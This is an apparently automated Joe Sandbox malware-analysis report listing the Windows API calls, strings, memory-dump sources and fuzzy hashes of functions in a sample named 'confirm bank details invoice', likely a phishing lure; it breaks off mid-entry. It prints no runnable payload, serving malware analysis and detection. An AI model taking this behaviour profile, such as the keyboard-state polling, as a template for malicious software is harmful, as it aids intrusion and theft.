                    • CoCreateInstance.OLE32(004FDA8C,00000000,00000001,00523CF8,?), ref: 004C043E
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004C04AD
                    • CoTaskMemFree.OLE32(?,?), ref: 004C0505
                    • _memset.LIBCMT ref: 004C0542
                    • SHBrowseForFolderW.SHELL32(?), ref: 004C057E
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004C05A1
                    • CoTaskMemFree.OLE32(00000000), ref: 004C05A8
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004C05DF
                    • CoUninitialize.OLE32(00000001,00000000), ref: 004C05E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: b9f234d4afabba37a3f4dffe8a8fac6f67b4a40a1f9e3271d4f983531c8a4761
                    • Instruction ID: 323e176503a0360e6b38b7d579b1a7f5a7d041275537713eeb78210fd39ce3d2
                    • Opcode Fuzzy Hash: b9f234d4afabba37a3f4dffe8a8fac6f67b4a40a1f9e3271d4f983531c8a4761
                    • Instruction Fuzzy Hash: 82B1CB75A00109EFDB54DFA5C888EAEBBB9FF48304B1484AAE909EB251D734ED41CF54
                    APIs
                    • GetKeyboardState.USER32(?), ref: 004B2ED6
                    • SetKeyboardState.USER32(?), ref: 004B2F41
                    • GetAsyncKeyState.USER32(000000A0), ref: 004B2F61
                    • GetKeyState.USER32(000000A0), ref: 004B2F78
                    • GetAsyncKeyState.USER32(000000A1), ref: 004B2FA7
                    • GetKeyState.USER32(000000A1), ref: 004B2FB8
                    • GetAsyncKeyState.USER32(00000011), ref: 004B2FE4
                    • GetKeyState.USER32(00000011), ref: 004B2FF2
                    • GetAsyncKeyState.USER32(00000012), ref: 004B301B
                    • GetKeyState.USER32(00000012), ref: 004B3029
                    • GetAsyncKeyState.USER32(0000005B), ref: 004B3052
                    • GetKeyState.USER32(0000005B), ref: 004B3060
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 2bb1b52ba2f14125c09dd232d4d402b5e7fad2559563941e974ed148f7702e62
                    • Instruction ID: ab4c44cf338e59b664318891cfcb39d644f66f5774cbabe85fee8a45b1cadafb
                    • Opcode Fuzzy Hash: 2bb1b52ba2f14125c09dd232d4d402b5e7fad2559563941e974ed148f7702e62
                    • Instruction Fuzzy Hash: 1B51E720A0878429FB35EBA589507EBBFF45F11344F08459FD5C25A2C2DA9C9B8CC77A
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 004AED1E
                    • GetWindowRect.USER32(00000000,?), ref: 004AED30
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004AED8E
                    • GetDlgItem.USER32(?,00000002), ref: 004AED99
                    • GetWindowRect.USER32(00000000,?), ref: 004AEDAB
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004AEE01
                    • GetDlgItem.USER32(?,000003E9), ref: 004AEE0F
                    • GetWindowRect.USER32(00000000,?), ref: 004AEE20
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004AEE63
                    • GetDlgItem.USER32(?,000003EA), ref: 004AEE71
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004AEE8E
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004AEE9B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 6bb64293039bf70f74ee7e512148aa1f40570270281e32b131170c7eac74dba9
                    • Instruction ID: d7b63ea7c4fd7bf894d7fdcaf70b72b1a40377300da46483fc663352bad395de
                    • Opcode Fuzzy Hash: 6bb64293039bf70f74ee7e512148aa1f40570270281e32b131170c7eac74dba9
                    • Instruction Fuzzy Hash: C9510EB1B00205AFDB18CF69DD89AAEBBBAFB99701F148139F519D7290D7749D00CB14
                    APIs
                      • Part of subcall function 0048B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0048B759,?,00000000,?,?,?,?,0048B72B,00000000,?), ref: 0048BA58
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0048B72B), ref: 0048B7F6
                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0048B72B,00000000,?,?,0048B2EF,?,?), ref: 0048B88D
                    • DestroyAcceleratorTable.USER32(00000000), ref: 004ED8A6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0048B72B,00000000,?,?,0048B2EF,?,?), ref: 004ED8D7
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0048B72B,00000000,?,?,0048B2EF,?,?), ref: 004ED8EE
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0048B72B,00000000,?,?,0048B2EF,?,?), ref: 004ED90A
                    • DeleteObject.GDI32(00000000), ref: 004ED91C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: 268fa37ab0fe41d8d8953c91bf2fd485a706e7ad198cbac54677a933c68e770c
                    • Instruction ID: 6225feb164f02ed5758b3c1577845bbf360c0928211591d591c30b7d806a8e2b
                    • Opcode Fuzzy Hash: 268fa37ab0fe41d8d8953c91bf2fd485a706e7ad198cbac54677a933c68e770c
                    • Instruction Fuzzy Hash: D2618E30901B40DFDB26AF65DC89B2A77F5FB54316F14092EE04286B60CB38A895DB8D
                    APIs
                      • Part of subcall function 0048B526: GetWindowLongW.USER32(?,000000EB), ref: 0048B537
                    • GetSysColor.USER32(0000000F), ref: 0048B438
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: c648b7b4a093f81368650867b2efb7c852786b6c38bb4efd99fced69c100b01d
                    • Instruction ID: b09a1d8e3d5ce2f12153bcb1cd04b86a3cb49a8164f789479431150d25a1bd4d
                    • Opcode Fuzzy Hash: c648b7b4a093f81368650867b2efb7c852786b6c38bb4efd99fced69c100b01d
                    • Instruction Fuzzy Hash: 5341B730400540AFDB216F28DC4ABBE3B66EB06B31F144666FDA58E2E6D7348C52D769
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                    • String ID:
                    • API String ID: 136442275-0
                    • Opcode ID: 72a6806e065a55134bf29cdb4ea7525ac7cee1eabd548a54cd0aa5e1f94b7c7d
                    • Instruction ID: 0bd62e9489edd4cc7f56898387120bbc69719b2cc7fec71fe57248e5add34e9a
                    • Opcode Fuzzy Hash: 72a6806e065a55134bf29cdb4ea7525ac7cee1eabd548a54cd0aa5e1f94b7c7d
                    • Instruction Fuzzy Hash: DA41817688511CAECF61DB95CC41CCF77BCEF44310F0041A7B649A2051EA38ABE48F68
                    APIs
                    • CharLowerBuffW.USER32(0050DC00,0050DC00,0050DC00), ref: 004BD7CE
                    • GetDriveTypeW.KERNEL32(?,00523A70,00000061), ref: 004BD898
                    • _wcscpy.LIBCMT ref: 004BD8C2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: d48646ba8cb40db6bfeafa9607aacade0f856c5f332afe843f4d22967aeae0d6
                    • Instruction ID: b99668da54f8937fe7ecc74a044b78b5fdaf0b1cffce4613f733682aaea79ce6
                    • Opcode Fuzzy Hash: d48646ba8cb40db6bfeafa9607aacade0f856c5f332afe843f4d22967aeae0d6
                    • Instruction Fuzzy Hash: 745182319042009FC700FF15D881AAFB7A5FF85318F10886EF4A957292EB39DD05CB5A
                    APIs
                    • __swprintf.LIBCMT ref: 004793AB
                    • __itow.LIBCMT ref: 004793DF
                      • Part of subcall function 00491557: _xtow@16.LIBCMT ref: 00491578
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __itow__swprintf_xtow@16
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 1502193981-2263619337
                    • Opcode ID: ad8f3a0d6dac98c2e65bdd610d8744f5c1964b94abf229c85ebf0a62125518ff
                    • Instruction ID: 97ff93e2461f9b33db3fa4c5d398df94892a64cecb1e3f5c4cd418f608a1cd5c
                    • Opcode Fuzzy Hash: ad8f3a0d6dac98c2e65bdd610d8744f5c1964b94abf229c85ebf0a62125518ff
                    • Instruction Fuzzy Hash: EA41F531500205AFEB24AB75D942EAA77E4EF88314F20846FE54DC72D1EA39AD42CB19
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004DA259
                    • CreateCompatibleDC.GDI32(00000000), ref: 004DA260
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004DA273
                    • SelectObject.GDI32(00000000,00000000), ref: 004DA27B
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 004DA286
                    • DeleteDC.GDI32(00000000), ref: 004DA28F
                    • GetWindowLongW.USER32(?,000000EC), ref: 004DA299
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004DA2AD
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004DA2B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: 05fed391cce42b960ec241394a4f6fe0e231b3c2d6db9b7680eb81c059d7735f
                    • Instruction ID: cf36318178eacfb12f98245d5c009f11a17c06b6c9f00da90cf5fd1e56fd6e68
                    • Opcode Fuzzy Hash: 05fed391cce42b960ec241394a4f6fe0e231b3c2d6db9b7680eb81c059d7735f
                    • Instruction Fuzzy Hash: 75319E31500114AFDF115FA5DC49FEB3B69FF0E364F100226FA19A62A0C739D821DBA9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 2620052-3771769585
                    • Opcode ID: 3a19e48a3387ce45a37619839fae5fad1812c298b5e94874cb07589c3934f8aa
                    • Instruction ID: d24e4d98f8b74fb1bab8176533d7159b693d1d511cc5dcdb912d6a62994433d2
                    • Opcode Fuzzy Hash: 3a19e48a3387ce45a37619839fae5fad1812c298b5e94874cb07589c3934f8aa
                    • Instruction Fuzzy Hash: 1D11D571904114AFDB147B65AC0AEFE7BACEF40714F05017AF10596181EE7C9A85DB68
                    APIs
                    • _memset.LIBCMT ref: 00495047
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    • __gmtime64_s.LIBCMT ref: 004950E0
                    • __gmtime64_s.LIBCMT ref: 00495116
                    • __gmtime64_s.LIBCMT ref: 00495133
                    • __allrem.LIBCMT ref: 00495189
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004951A5
                    • __allrem.LIBCMT ref: 004951BC
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004951DA
                    • __allrem.LIBCMT ref: 004951F1
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0049520F
                    • __invoke_watson.LIBCMT ref: 00495280
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                    • Instruction ID: ad09b0678c3b99b7d685f3f75a9ef16fb6c7706fa8d38d0e1280ef3accc85d2a
                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                    • Instruction Fuzzy Hash: 68710472A00B16ABDF159F69CC42B5B7BA8AF11768F24423BE410D6281E778D9408BD8
                    APIs
                    • _memset.LIBCMT ref: 004B4DF8
                    • GetMenuItemInfoW.USER32(00531708,000000FF,00000000,00000030), ref: 004B4E59
                    • SetMenuItemInfoW.USER32(00531708,00000004,00000000,00000030), ref: 004B4E8F
                    • Sleep.KERNEL32(000001F4), ref: 004B4EA1
                    • GetMenuItemCount.USER32(?), ref: 004B4EE5
                    • GetMenuItemID.USER32(?,00000000), ref: 004B4F01
                    • GetMenuItemID.USER32(?,-00000001), ref: 004B4F2B
                    • GetMenuItemID.USER32(?,?), ref: 004B4F70
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004B4FB6
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004B4FCA
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004B4FEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: cc9592df97da5de02e6c0782dd047bc1923227cba74367fe5514fbd73fd26ef8
                    • Instruction ID: 997a9e466f8722d1eda264f979d6beb9b63b2043dda08b6ecb53fd6eb9b77978
                    • Opcode Fuzzy Hash: cc9592df97da5de02e6c0782dd047bc1923227cba74367fe5514fbd73fd26ef8
                    • Instruction Fuzzy Hash: 58618E71900249AFDB21CFA4D888AFF7BB9EB85308F14015AF441A7252D738ED15DB39
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004D9C98
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004D9C9B
                    • GetWindowLongW.USER32(?,000000F0), ref: 004D9CBF
                    • _memset.LIBCMT ref: 004D9CD0
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004D9CE2
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004D9D5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: d36fc15d0324125b7e2869307d8fda0a42c09f591d71b57fd7637b2792e1a9bb
                    • Instruction ID: f1122a21fd5ecadca1f92adf0960128fb406df86c9e9bebb8a61e684b6616c93
                    • Opcode Fuzzy Hash: d36fc15d0324125b7e2869307d8fda0a42c09f591d71b57fd7637b2792e1a9bb
                    • Instruction Fuzzy Hash: B3617A75A00208AFDB10DFA8CC91EEE77B8EB09704F14415AFA05EB3A1D774AD46DB58
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004A94FE
                    • SafeArrayAllocData.OLEAUT32(?), ref: 004A9549
                    • VariantInit.OLEAUT32(?), ref: 004A955B
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004A957B
                    • VariantCopy.OLEAUT32(?,?), ref: 004A95BE
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004A95D2
                    • VariantClear.OLEAUT32(?), ref: 004A95E7
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 004A95F4
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004A95FD
                    • VariantClear.OLEAUT32(?), ref: 004A960F
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004A961A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: aa00e6f021ecdb5f10a2d0963dfdb81d130f3a49db237e7205eee4d6e15ef207
                    • Instruction ID: 61180e639df3ecf250c9b39a258c390a863b2ff6e7c6ed4f5878037ca2bb6670
                    • Opcode Fuzzy Hash: aa00e6f021ecdb5f10a2d0963dfdb81d130f3a49db237e7205eee4d6e15ef207
                    • Instruction Fuzzy Hash: FC416031D00219AFCB01EFA4DC849EEBBB9FF19354F00846AF501A7251DB34EA55CBA9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?R$|?R
                    • API String ID: 2862541840-2264138851
                    • Opcode ID: 22a22ca5cd0d940f2258fc220a15bab37473ea013d97a2f9ac3287e6597b8eff
                    • Instruction ID: 5b11abe58c54d6779694adc5ddf13d2fdfca7332111b551396742c5e2758da6f
                    • Opcode Fuzzy Hash: 22a22ca5cd0d940f2258fc220a15bab37473ea013d97a2f9ac3287e6597b8eff
                    • Instruction Fuzzy Hash: 0591BE75A00219ABDF60CF95D845FAFBBB8EF85310F10812EF516AB280D7789941CBE4
                    APIs
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • CoInitialize.OLE32 ref: 004CADF6
                    • CoUninitialize.OLE32 ref: 004CAE01
                    • CoCreateInstance.OLE32(?,00000000,00000017,004FD8FC,?), ref: 004CAE61
                    • IIDFromString.OLE32(?,?), ref: 004CAED4
                    • VariantInit.OLEAUT32(?), ref: 004CAF6E
                    • VariantClear.OLEAUT32(?), ref: 004CAFCF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: c651f56bdc15ebc8e93dd245c55980f0f8d979b8294b383da98a5b84f3eb97e8
                    • Instruction ID: 27db50d015de79f202dd7f9a3210beea4a9c75ae11c9406aac9c24642a20b3ac
